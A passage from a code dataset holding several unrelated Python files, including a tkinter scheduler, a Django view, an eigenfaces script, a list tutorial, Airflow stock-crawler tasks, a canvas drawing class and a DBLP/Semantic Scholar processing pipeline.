12, padx = 5)\r\n\r\n frame_left = Frame(frame_body_right)\r\n frame_left.grid(row=1, column=0)\r\n frame_right = Frame(frame_body_right, height = 300, width = 200)\r\n frame_right.grid(row=1, column=1)\r\n\r\n # frame for days and positions\r\n lbl_after = Label(frame_left, text=\"Afternoon:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_left, 
text=\"Night:\").grid(row=2, column=0, padx=10, pady=10)\r\n for x in range(0, 3, 2):\r\n lbl_incharge = Label(frame_left, text=\"Incharge\")\r\n lbl_patrol = Label(frame_left, text=\"Patrol\")\r\n lbl_incharge.grid(row=x, column=1, padx=2, pady=2)\r\n lbl_patrol.grid(row=x + 1, column=1, padx=2, pady=2)\r\n last_week = []\r\n for x in range(4):\r\n combo_last_week = Combobox(frame_right, width=8, value = values(emp_list))\r\n combo_last_week.grid(row=x, padx = 10, pady = 4)\r\n combo_last_week.current(0)\r\n last_week.append(combo_last_week)\r\n\r\n\r\n #This bit is for the personal restrictions that the employees themselves have sent\r\n #creating a shifts variable, a list of lists that in it there would be the the employees willing work each shift\r\n shifts = []\r\n for x in range(42):\r\n shifts.append([])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n frame_btm = Frame(gen_win, width = 500, height = 500)\r\n frame_btm.grid(row =3, pady=30)\r\n\r\n combo = Combobox(frame_btm, state='readonly')\r\n combo.configure(value=values(emp_list))\r\n choose_emp = Label(frame_btm, text=\"Choose employee: \")\r\n choose_emp.grid(row=0, padx=20, column=0, sticky = 'w')\r\n combo.grid(row=0, column=1, padx=20)\r\n combo.current(0)\r\n select_btn = Button(frame_btm, text=\"Select\", command = personal_rest)\r\n select_btn.grid(row=0, column=2, padx=20, sticky = 'e')\r\n\r\n next_btn = Button(gen_win, text = \"Generate Schedule\", command = check_restrictions)\r\n next_btn.grid(row =4, column = 0, sticky = 'e', padx = 20)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MaEyal/Work-Schedule","sub_path":"Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":19919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19401052476","text":"import random\n\n# Mendeklarasikan variabel n sebagai input dengan tipe data integer\nn = int(input(\"Masukan nilai N: \"))\n# Perulangan untuk mencetak berapa baris yang dibuat berdasarkan variabel n\nfor i in range(n):\n # Mencetak perulangan, ditambah 1 setiap perulangan terjadi, untuk menjadikan baris pertama = 1,\n # dan mencetak angka acak dengan tipe data float.\n print(\"data ke\",i+1,\":\" , random.uniform(0, 0.5))\nprint(\"Selesai\")\n","repo_name":"antonmartinus72/labpy03","sub_path":"py/latihan1.py","file_name":"latihan1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19774394793","text":"from django.db.models.functions import Lower\n\nfrom base.apps.github.models import User, Follower\n\nfrom views.base import ListView\nfrom ..mixins import UserMixin\n\nclass ListView(UserMixin,ListView):\n context_object_name = \"user_list\"\n template_name = \"user/following/user_list.html\"\n\n def get_queryset(self,**kwargs):\n qs = User.objects.filter(\n id__in=Follower.objects.filter(follower_id=self.github_user.id).values_list('user_id',flat=True)\n )\n q = self.request.GET.get('q','').strip()\n if q:\n qs = qs.filter(\n Q(**{'login__icontains':q}) |\n Q(**{'name__icontains':q}) |\n Q(**{'company__icontains':q}) |\n Q(**{'location__icontains':q})\n )\n return qs.order_by(Lower('login'))\n","repo_name":"andrewp-as-is/gist-list-django-server","sub_path":"views/user/following/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40967376966","text":"from image import color2gray, file2image, image2display\nfrom svd import factor\nimport os\nfrom math import sqrt\n\nimport sys\nsys.path.append('../vectors')\nsys.path.append('../matrix')\nfrom vec import Vec\nfrom mat import Mat\nfrom vecutil import list2vec\nfrom matutil import rowdict2mat, mat2coldict, coldict2mat\n\ndef load_images(path, n = 20):\n '''\n Input:\n - path: path to directory containing img*.png\n - n: number of images to load\n Output:\n - dict mapping numbers 0 to (n-1) to a list of rows,\n each of which is a list of pixel brightnesses\n '''\n return {i:color2gray(file2image(os.path.join(path,\"img%02d.png\" % i))) for i in range(n)}\n\ndef vec2image(vec, rowsCnt, colsCnt):\n indexes = sorted(list(vec.D))\n result = []\n for i in range(rowsCnt):\n result.append([])\n for j in range(colsCnt):\n result[-1].append(vec[i * colsCnt + j])\n\n return result\n\ndef find_centroid(images):\n return sum(images.values()) / len(images)\n\ndef center_images(images, centroid):\n return { key: (val - centroid) for key, val in images.items() }\n\ndef projected_representation(M, x):\n return M * x\n\ndef projection_length_squared(M, x):\n repr = projected_representation(M, x)\n return repr * repr\n\ndef distance_squared(M, x):\n repr = projected_representation(M, x)\n return x * x - repr * repr\n\ndef project(M, x):\n coordinates = projected_representation(M, x)\n return coordinates * M\n\nraw_images = load_images('./faces')\nrowsCnt = len(raw_images[0])\ncolsCnt = len(raw_images[0][0])\n\nimages = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images.items() }\ncentroid = find_centroid(images)\ncentered_images = center_images(images, centroid)\nM = rowdict2mat(centered_images)\n\nprint('Factoring...')\nU, E, V = factor(M)\nprint('Done')\nprint(len(U.D[0]), len(U.D[1]))\nprint(len(E.D[0]), len(E.D[1]))\nprint(len(V.D[0]), len(V.D[1]))\nprint(E[0,0], E[1,1], E[2,2], E[3,3])\n\north_basis = rowdict2mat({ key: vec for key, vec in mat2coldict(V).items() if key < 10 })\nprint(len(orth_basis.D[0]), len(orth_basis.D[1]))\nprint(len(centered_images[0].D))\n\nprint({ key: distance_squared(orth_basis, image) for key, image in centered_images.items() })\n\nprint('UNCLASIFIED')\nraw_images_uncl = load_images('./unclassified', 10)\nimages_uncl = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images_uncl.items() }\ncentered_images_uncl = center_images(images_uncl, centroid)\n\ndist = { key: distance_squared(orth_basis, image) for key, image in centered_images_uncl.items() }\nmax = max(dist.values())\ndist = { key: val * 100 / max for key, val in dist.items() }\n\nprint(dist)\n\nprint(\"Eigen Faces\")\n\nfor i in range(10):\n projection = project(orth_basis, centered_images_uncl[i]) + centroid\n image2display(vec2image(projection, rowsCnt, colsCnt))\n","repo_name":"AleksandrRogachev94/CodingTheMatrix","sub_path":"svd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39059507923","text":"import sys\nsys.stdin = open('input_russia.txt', 'r')\nN = int(input())\n\nfor tc in range(1, N+1):\n r, c = map(int, input().split())\n flag = []\n for _ in range(r):\n flag.append(list(map(str, input())))\n print(flag)\n","repo_name":"91hongppie/algorithm","sub_path":"190919/russia.py","file_name":"russia.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"25196444878","text":"# 使用list函数\nll = list('hello list')\nprint(ll)\n\n# 列表元素赋值 如 x[3]=5\nx = [1,2,3,4,5]\n# 改变列表第四个元素的值\nx[3] = 5\nprint(x)\n\n# 删除元素 del\nnames = ['zhangsan','lisi','wangwu','zhaoliu']\nprint(names)\n# 删除第三个元素\ndel names[2]\n# 最后列表长度变为3\nprint(names)\n\n\n# 分片赋值\nname = list('python')\nname[2:] = 'wr'\nprint(name)\n\n# 序列不等长分片替换\nname_re = list('perl')\n# 替换第一个元素后的所有内容\nname_re[1:] = list('ython')\nprint(name_re)\n\n# 插入新元素\nnum = [1,4,5]\n# 在第一个元素后插入新的元素\nnum[1:1] = [2,3]\nnum\nprint(num)\n\n# 给第一个和迪桑元素之间分片赋值一个空序列,即删除元素\nnum[1:3] = []\nnum\n[1, 4, 5]\n\n# 负数分片操作\nnum[-1:-1] = [5,5,5]\nprint(num)\n\n\n# 列表方法 追加内容\nlist_append = [1,2,3,4]\nlist_append.append(5)\nprint(list_append)\n\n# 统计列表中某个内容的词频\nnum.count(5)\n\n\n# 统计字母a出现的次数\nname = ['a','a','abf','ark','nhk']\n\nname.count('a')\n\n\n# extend 方法\na =[1,2,3]\nb = [4,5,6]\n# 将列表b追加在列表a后面\na.extend(b)\nprint(a)\n\n\n# index 方法\ncontent = ['where','who','lisi','cntent','who']\ncontent.index('who')\n\n# insert 方法\nnum = [1,2,5,6,7]\nnum.insert(2,3)\nprint(num)\nnum.insert(3,4)\nprint(num)\n\n\n# pop 方法\nx = [1,2,3]\nx.pop()\n3\nprint(x)\nx.pop()\nprint(x)\n\n# remove 方法\ncontent = ['where', 'who', 'lisi', 'cntent', 'who', 'who']\n# 移除了第一个匹配的元素\ncontent.remove('who')\nprint(content)\n\n\n# reverse 方法\nx = [1, 2, 3]\n# 元素反向存储\nx.reverse()\nprint(x)\n\n# sort 方法\nx = [2,3,5,6,1,4,7]\nx.sort()\nprint(x)\n\n# clear 方法\nlist1 = ['baidu', 'google', 12, 23]\nprint(list1)\nlist1.clear()\nprint(list1)\n\n# copy 方法\nlist1 = ['baidu', 'google', 12, 23];\nlist2 = list1.copy()\nprint(list2)\n","repo_name":"JustDoPython/python-100-day","sub_path":"day-008/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"zh","doc_type":"code","stars":699,"dataset":"github-code","pt":"19"}
+{"seq_id":"13203141842","text":"import datetime\n\nfrom airflow.operators.python_operator import (\n PythonOperator,\n)\n\nfrom dataflow.backend import db\nfrom dataflow.crawler.taiwan_stock_price import (\n crawler,\n)\n\n\ndef crawler_taiwan_stock_price_twse(\n **kwargs,\n):\n # 由於在 DAG 層,設定 params,可輸入參數\n # 因此在此,使用以下 kwargs 方式,拿取參數\n # DAG 中 params 參數設定是 date (YYYY-MM-DD)\n # 所以拿取時,也要用一樣的字串\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n # 如果沒有帶參數,則預設 date 是今天\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n # 進行爬蟲\n df = crawler(\n dict(\n date=date,\n data_source=\"twse\",\n )\n )\n # 資料上傳資料庫\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef crawler_taiwan_stock_price_tpex(\n **kwargs,\n):\n # 註解如上\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n df = crawler(\n dict(\n date=date,\n data_source=\"tpex\",\n )\n )\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef create_crawler_taiwan_stock_price_task() -> PythonOperator:\n return [\n # 建立任務\n PythonOperator(\n task_id=\"taiwan_stock_price_twse\",\n python_callable=crawler_taiwan_stock_price_twse,\n queue=\"twse\",\n provide_context=True,\n ),\n PythonOperator(\n task_id=\"taiwan_stock_price_tpex\",\n python_callable=crawler_taiwan_stock_price_tpex,\n queue=\"tpex\",\n provide_context=True,\n ),\n ]\n","repo_name":"FinMind/FinMindBook","sub_path":"DataEngineering/Chapter12/12.8/dataflow/etl/taiwan_stock_price.py","file_name":"taiwan_stock_price.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"}
+{"seq_id":"9811511735","text":"#creating an empty list \nnumbers=[]\n\nn=int(input(\"Enter no of names u1 want to input \"))\n\nfor i in range(0,n):\n element=int(input())\n\n numbers.append(element)\n\n print(numbers)","repo_name":"thebinsohail/Python-Workspace","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"20750351104","text":"\nimport numpy as np\nfrom numpy import inf\nfrom ipycanvas import hold_canvas\nfrom findirection.envs.draw_grid import DrawGrid, Level\nfrom findirection.envs.grid_info import GridInfo\nfrom findirection.envs.arrows import Arrows\nfrom findirection.envs.directions import Direction\n\n\nclass DrawInfo():\n\n arrow_color = '#00008b' \n text_bg_color = 'rgba(40,40,40,0.7)' \n text_fg_color = '#fff' \n\n precision = 3 \n\n\n def __init__( self, draw_grid: DrawGrid, grid_info: GridInfo, **kwargs: dict ):\n \n self.grid = draw_grid.grid\n\n self.grid_info = grid_info\n\n self.draw_grid = draw_grid \n self.canvas = self.draw_grid.canvases[Level.Text]\n\n self.set_properties(kwargs.get('grid',None)) \n\n self.arrows = Arrows( draw_grid.cell_pixels, draw_grid.padding,length=24,width=7,height=11) \n\n\n def draw( self, props: dict ):\n\n if props is not None: \n self.precision = props.get('precision', self.precision)\n directions = props.get('directions',None)\n if directions is not None: \n self.process_direction_arrows(directions)\n self.process_direction_text(directions)\n\n self.process_text(props)\n\n self.process_info(props)\n\n if props.get('coords',False):\n self.draw_coordinates()\n\n\n\n def set_default_values(self,args): \n \n defaultargs = ((0,0),\"\",190,20)\n\n args += (None,)*len(defaultargs) \n\n args = tuple(map(lambda x, y: y if y is not None else x, defaultargs, args))\n return args\n\n\n def process_info(self,info):\n\n fg_color = 'black'\n bk_color = 'white'\n\n text = info.get('side_info',None)\n if text is not None: \n\n if self.draw_grid.side_panel is None:\n raise Exception(\"\\'side_panel\\' must be specified during grid creation to allow side panel text.\")\n\n if type(self.draw_grid.side_panel) == dict:\n fg_color = self.draw_grid.side_panel.get('text_fg','black') \n bk_color = self.draw_grid.side_panel.get('color','white') \n\n if self.draw_grid.side_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n text = info.get('bottom_info',None)\n if text is not None: \n\n if self.draw_grid.bottom_panel is None:\n raise Exception(\"\\'bottom_panel\\' must be specified during grid creation to allow bottom panel text.\")\n\n if type(self.draw_grid.bottom_panel) == dict:\n fg_color = self.draw_grid.bottom_panel.get('text_fg','black') \n bk_color = self.draw_grid.bottom_panel.get('color','white') \n\n if self.draw_grid.bottom_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n cy += self.draw_grid.height_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cy += self.draw_grid.height_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n def process_text(self,info):\n\n text = info.get('text',None) \n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_text_array(text)\n else:\n for (cx,cy),value in text: \n self.draw_cell_text(cx,cy,value)\n\n\n def process_direction_arrows(self,directions):\n\n arrows = directions.get('arrows',None)\n if arrows is not None:\n if isinstance(arrows,np.ndarray):\n 
self.draw_direction_arrow_array(arrows) \n else: \n\n if len(arrows) > 0 and (type(arrows[0][0]) == int): \n for (cx,cy) in arrows:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_arrow(cx,cy,direction) \n\n else:\n for (cx,cy),direction in arrows: \n self.draw_direction_arrow(cx,cy,direction) \n\n\n def process_direction_text(self,directions):\n\n text = directions.get('text',None)\n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_direction_text_array(text) \n else:\n if len(text) > 0 and (type(text[0][0]) == int): \n for (cx,cy) in text:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_text(cx,cy,direction) \n\n else:\n for (cx,cy),direction in text: \n self.draw_direction_text(cx,cy,direction) \n\n\n\n def set_properties( self, grid_props: dict ):\n\n if grid_props is not None:\n colors = grid_props.get('colors',None)\n if colors is not None: \n self.arrow_color = colors.get('arrows', self.arrow_color) \n self.text_fg_color = colors.get('text_fg', self.text_fg_color) \n self.text_bg_color = colors.get('text_bg', self.text_bg_color) \n\n\n \n def draw_direction_arrow( self, x, y, directions ): \n \n canvas = self.draw_grid.canvases[Level.Overlay]\n color = self.arrow_color \n padding = self.draw_grid.padding\n cell_pixels = self.draw_grid.cell_pixels\n px,py = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n\n with hold_canvas(canvas): \n canvas.clear_rect(px,py,cell_pixels,cell_pixels)\n\n with hold_canvas(canvas): \n self.arrows.draw(canvas,px,py,directions,color) \n\n\n def draw_direction_arrow_array(self, directions: np.array):\n canvas = self.draw_grid.canvases[Level.Overlay] \n with hold_canvas(canvas): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n self.draw_direction_arrow( x, y, directions[y,x]) \n\n\n \n def draw_direction_text( self, x, y, direction ):\n self.draw_cell_text( x, y, Direction.get_string(direction) )\n\n\n def draw_direction_text_array(self,directions): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n if x != self.grid.end[0] or y != self.grid.end[1]: \n self.draw_direction_text( x, y, directions[y,x]) \n \n\n def draw_coordinates(self):\n with hold_canvas(self.canvas): \n for y in range(self.draw_grid.grid.height):\n for x in range(self.draw_grid.grid.width):\n self.draw_cell_text( x, y, f\"({x},{y})\") \n \n\n\n def draw_text_array(self,text):\n with hold_canvas(self.canvas): \n for y in range(text.shape[0]):\n for x in range(text.shape[1]):\n self.draw_cell_text( x, y, text[y,x]) \n\n\n def info_panel_text( self, x, y, text,width,height, \n fg_color='#000', \n bk_color='#fff',\n font='bold 14px sans-serif',\n text_align='left',\n text_baseline='top'): \n canvas = self.canvas\n canvas.save()\n with hold_canvas(canvas): \n canvas.fill_style = fg_color\n canvas.text_align = text_align\n canvas.text_baseline = text_baseline\n canvas.font = font\n canvas.fill_text(text, x, y)\n canvas.restore()\n\n\n def clear_info_panel_text( self, x, y, width, height, bk_color='#fff'):\n canvas = self.canvas\n with hold_canvas(canvas): \n canvas.fill_style = bk_color \n canvas.fill_rect(x,y-5,width,height) \n\n\n def draw_cell_text( self, x, y, value, color = None, back_color = None ): \n num_value = False\n if type(value).__name__.startswith('str'):\n if len(value) == 0:\n return\n elif isinstance(value, (int, float, complex)) and not isinstance(value, bool):\n num_value = True\n if np.isnan(value):\n return\n\n if 
self.grid.test_for_base_area(x,y): \n return\n \n if isinstance(value, float):\n if self.precision == 0:\n value = int(value)\n else:\n value = round(value,self.precision) \n \n canvas = self.canvas\n padding = self.draw_grid.padding\n\n if color is None: color = self.text_fg_color\n if back_color is None: back_color = self.text_bg_color\n\n gx,gy = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n cx,cy = self.draw_grid.get_center(gx,gy) \n\n bk_height = 20\n bk_width = 36\n\n if len(str(value)) > 4:\n bk_width += (len(str(value))-4) * 6\n\n if bk_width > (self.draw_grid.cell_pixels - 4):\n bk_width = (self.draw_grid.cell_pixels - 4)\n\n x_off = (bk_width//2)\n y_off = (bk_height//2)\n\n font_size = 14\n text_offset = 5\n if (num_value and self.precision > 1) or \\\n (not num_value and len(str(value)) >= 3):\n font_size = 12 \n text_offset = 4\n font_str = f\"bold {font_size}px sans-serif\"\n\n canvas.save()\n\n with hold_canvas(canvas): \n canvas.clear_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n if back_color is not None:\n canvas.fill_style = back_color \n canvas.fill_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n\n with hold_canvas(canvas): \n canvas.fill_style = color\n canvas.text_align = 'center'\n canvas.font = font_str\n canvas.fill_text(f\"{value}\", cx, cy+text_offset)\n\n canvas.restore()","repo_name":"arman-zhumakhan/arman-zhumakhan.github.io","sub_path":"projects/reinforcement-learning-project/findirection/envs/draw_info.py","file_name":"draw_info.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
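DrawInfo wraps every batch of drawing commands in hold_canvas so a cell is repainted in a single frame rather than flickering per call. The minimal pattern, runnable in a Jupyter notebook with ipycanvas installed (sizes and colors here are arbitrary):

```python
from ipycanvas import Canvas, hold_canvas

canvas = Canvas(width=200, height=100)
with hold_canvas(canvas):  # buffer commands, flush once on exit
    canvas.clear_rect(0, 0, 200, 100)
    canvas.fill_style = "#00008b"
    canvas.fill_rect(10, 10, 36, 20)
    canvas.fill_style = "#fff"
    canvas.fill_text("0.123", 14, 24)
canvas  # last expression displays the widget in the notebook
```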
+{"seq_id":"10663816718","text":"import urllib.request\nimport shutil\nimport gzip\nimport json\nimport os\nimport re\nfrom collections import defaultdict\n\nfrom tqdm import tqdm\n\nfrom dblp_parser import parse_dblp, parse_dblp_person, get_dblp_country\n\nDATA_PATH = \"../data/\"\nDBLP_URL = 'https://dblp.org/xml/'\nSEMANTIC_SCHOLAR_URL = 'https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/2020-01-01/'\n\n\ndef download_dblp() -> None:\n \"\"\"\n This functions downloads the DBLP XML and DTD.\n \"\"\"\n source_gz = DBLP_URL + 'release/dblp-2020-01-01.xml.gz'\n source_dtd = DBLP_URL + 'release/dblp-2019-11-22.dtd'\n target_gz = DATA_PATH + 'dblp.xml.gz'\n target_dtd = DATA_PATH + 'dblp-2019-11-22.dtd'\n\n print('Downloading file ' + source_gz)\n with urllib.request.urlopen(source_gz) as response, open(target_gz, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Downloading file ' + source_dtd)\n with urllib.request.urlopen(source_dtd) as response, open(target_dtd, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Download finish!')\n print()\n\n\ndef unzip_dblp() -> None:\n \"\"\"\n This functions unzip the DBLP dataset.\n \"\"\"\n source = DATA_PATH + 'dblp.xml.gz'\n target = DATA_PATH + 'dblp.xml'\n\n with gzip.open(source, 'rb') as f_in:\n with open(target, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print()\n\n\ndef extract_publications() -> None:\n \"\"\"\n Reading the DBLP XML and parse it into a json file for further processing.\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'dblp.json'\n\n print('Parsing ' + source)\n parse_dblp(source, target)\n print('Parse finish! File dblp.json created!')\n print()\n\n\ndef extract_ai_publications(source: str = DATA_PATH + 'dblp.json',\n target: str = DATA_PATH + 'ai_dblp.json') -> set:\n \"\"\"\n Extracting the AI publications from the DBLP dataset.\n :param source: From where to read the pubs.\n :param target: Where to write the pubs to.\n :return: List of authors, which have published an AI publication\n \"\"\"\n source_venues = DATA_PATH + '../ai_venues.json'\n\n with open(source_venues, \"r\", encoding=\"utf-8\") as f:\n venues = json.load(f)\n venues = {a for b in venues.values() for a in b}\n\n authors = set()\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if line['booktitle']:\n curr_venue = line['booktitle'][0]\n elif line['journal']:\n curr_venue = line['journal'][0]\n else:\n continue\n curr_venue = re.sub(\" \\\\([0-9]+\\\\)$\", \"\", curr_venue)\n if curr_venue in venues:\n line['venue'] = curr_venue\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n authors.update(line['author'])\n print('Parse finish! File created!')\n print()\n return authors\n\n\ndef extract_persons(author_set: set) -> None:\n \"\"\"\n Extracting person information from DBLP and write it down.\n Note that we exclude person records that have the\n publtype disambiguation.\n :param author_list: A list of authors,\n which have published an AI publication\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'persons.json'\n\n print('Parsing ' + source)\n parse_dblp_person(source, target, author_set)\n print('Parse finish! 
File persons.json created!')\n    print()\n\n\ndef parse_countries():\n    \"\"\"\n    Extract countries for all authors in the AI DBLP.\n    Countries are found using a file of possible country names.\n    \"\"\"\n    source_person = DATA_PATH + 'persons.json'\n    source_country = DATA_PATH + '../poss_countries.txt'\n    target = DATA_PATH + 'author_countries.json'\n\n    get_dblp_country(source_person, source_country, target)\n    print('Parse finished! File author_countries.json created!')\n    print()\n\n\ndef extract_community_publications() -> None:\n    \"\"\"\n    Extracts all publications that have at least one author\n    whom we consider an AI author.\n    \"\"\"\n    source = DATA_PATH + 'dblp.json'\n    source_persons = DATA_PATH + 'persons.json'\n    target_pubs = DATA_PATH + \"ai_community_dblp.json\"\n    with open(source_persons, encoding=\"utf-8\") as file:\n        persons = [json.loads(line) for line in file]\n    # Put all author names into set\n    authors = {}\n    for person in persons:\n        author_name = person[\"author\"]\n        if isinstance(author_name, list):\n            for a in author_name:\n                authors[a] = person[\"key\"]\n        elif isinstance(author_name, str):\n            authors[author_name] = person[\"key\"]\n    with open(target_pubs, \"w\", encoding=\"utf-8\") as out_f:\n        with open(source, \"r\", encoding=\"utf-8\") as in_f:\n            for line in tqdm(in_f):\n                line = json.loads(line)\n                if \"author\" in line:\n                    matched_authors = [a for a in line[\"author\"]\n                                       if a in authors]\n                    if matched_authors:\n                        line[\"ai_authors\"] = matched_authors\n                        line[\"ai_authors_keys\"] = [authors[author] for author\n                                                   in matched_authors]\n                        json.dump(line, out_f)\n                        out_f.write(\"\\n\")\n    print(\"Finished ai_community_dblp.json file!\")\n    print()\n\n\n# --- Helper for Extract Semantic scholar ---\ndef download_semantic_scholar_if_needed(semantic_scholar_path: str,\n                                        default_count: int = 181) -> None:\n    \"\"\"\n    Helper for matching Semantic Scholar. Downloads the whole corpus.\n    \"\"\"\n    if not os.path.exists(semantic_scholar_path):\n        os.mkdir(semantic_scholar_path)\n        with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + \"manifest.txt\") as response:\n            with open(semantic_scholar_path + \"manifest.txt\", 'wb') as fh:\n                shutil.copyfileobj(response, fh)\n        with open(semantic_scholar_path + \"/manifest.txt\", \"r\") as f:\n            for line in tqdm(f, total=default_count):\n                line = line.strip()\n                with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + line) as response:\n                    with open(semantic_scholar_path + line, 'wb') as fh:\n                        shutil.copyfileobj(response, fh)\n\n\ndef get_doi(line) -> str:\n    \"\"\"\n    Get the doi for a given line of the data, useful for Semantic Scholar matching.\n    \"\"\"\n    if \"ee\" in line:\n        for x in line[\"ee\"]:\n            if \"doi\" in x:\n                return x.replace(\"https://doi.org/\", \"\")\n\n\ndef match_semantic_scholar() -> None:\n    \"\"\"\n    Match all the publications to Semantic Scholar. Also downloads Semantic Scholar\n    if needed. 
Writes the matched data to ai_community_dataset.json\n    \"\"\"\n    source = DATA_PATH + 'ai_community_dblp.json'\n    target = DATA_PATH + 'ai_community_dataset.json'\n    semantic_scholar_path = DATA_PATH + \"semantic_scholar/\"\n    download_semantic_scholar_if_needed(semantic_scholar_path)\n\n    with open(source, \"r\", encoding=\"utf-8\") as f:\n        pubs = f.readlines()\n    pubs = [json.loads(x) for x in pubs]\n    removed_indices = set()\n    titles = defaultdict(list)\n    [titles[x['title'].strip(\".\").lower()].append(i)\n     for i, x in enumerate(pubs)]\n    files = [file_path for file_path in os.listdir(semantic_scholar_path)\n             if \"s2-corpus-\" in file_path]\n    counter = 1\n    with open(target, 'w', encoding=\"utf-8\") as out_f:\n        for file_path in files:\n            print(\"Reading file ... (\",\n                  str(counter), \"/\",\n                  str(len(files)), \")\")\n            with gzip.open(semantic_scholar_path + file_path,\n                           'rt',\n                           encoding=\"utf-8\") as in_f:\n                for line in in_f:\n                    line = json.loads(line)\n                    curr_title = line['title'].strip().lower()\n                    if curr_title in titles:\n                        index = None\n                        for i in titles[curr_title]:\n                            pub = pubs[i]\n                            doi = get_doi(pub)\n                            if doi and \"doi\" in line and line[\"doi\"]:\n                                if doi == line[\"doi\"]:\n                                    index = i\n                                    break\n                            elif \"year\" in line and int(pub[\"year\"]) == int(line[\"year\"]):\n                                if line[\"venue\"] == \"ArXiv\":\n                                    if pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n                                        index = i\n                                        break\n                                elif pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n                                    continue\n                                else:\n                                    index = i\n                                    break\n                        if index is not None and index not in removed_indices:\n                            if 'abstract' not in pub:\n                                pub['abstract'] = line['paperAbstract']\n                            if 'in_citations' not in pub:\n                                pub['in_citations'] = line['inCitations']\n                            if 'out_citations' not in pub:\n                                pub['out_citations'] = line['outCitations']\n                            if 'ss_id' not in pub:\n                                pub['ss_id'] = line['id']\n                            if 'doi' not in pub and 'doi' in line:\n                                pub['doi'] = [line['doi']]\n                            json.dump(pub, out_f)\n                            out_f.write(\"\\n\")\n                            removed_indices.add(index)\n            counter += 1\n        for i, pub in enumerate(pubs):\n            if i not in removed_indices:\n                json.dump(pub, out_f)\n                out_f.write(\"\\n\")\n    print(\"Finished. \")\n\n\ndef extract_german_ai(source: str = DATA_PATH + 'ai_community_dataset.json',\n                      target: str = DATA_PATH + 'german_ai_community_dataset.json') -> None:\n    \"\"\"\n    Extracts all publications in which at least one author is flagged as\n    German.\n    \"\"\"\n    countries = DATA_PATH + 'author_countries.json'\n    with open(countries, \"r\", encoding=\"utf-8\") as f:\n        countries = f.readlines()\n    countries = [json.loads(x) for x in countries]\n    german_authors = [(x['author'], x['key']) for x in countries\n                      if \"Germany\" in x[\"countries\"]]\n    german_names = {}\n    for author, dblp_id in german_authors:\n        if isinstance(author, list):\n            for aut in author:\n                german_names[aut] = dblp_id\n        elif isinstance(author, str):\n            german_names[author] = dblp_id\n    with open(source, \"r\", encoding=\"utf-8\") as in_f:\n        with open(target, \"w\", 